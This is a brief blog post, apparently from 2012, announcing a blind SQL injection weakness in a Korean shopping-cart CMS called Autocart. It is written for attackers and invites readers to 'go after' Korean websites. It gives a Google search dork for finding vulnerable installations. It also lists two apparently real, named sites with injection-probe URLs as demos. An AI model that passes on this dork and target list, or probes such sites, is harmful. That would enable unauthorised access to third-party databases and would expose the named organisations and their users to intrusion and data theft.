Friday, November 30, 2012

Korea Autocart CMS - Blind SQLI Vuln

If it is Korean websites in particular that you want to go after, this method should work well.
It is just one kind of blind SQLi.

DORK : inurl:/autocart/market/

When using the dork, you will have to look for php?="Someone", and only then check whether the exploit works.


Take a look at a few example sites.


Demo
http://www.iganaland.com/autocart/market/play/product_list.php?category_num=46'

http://www.kin.or.kr/autocart/market/board/board_read.php?index_no=2601&bbs_no=6'

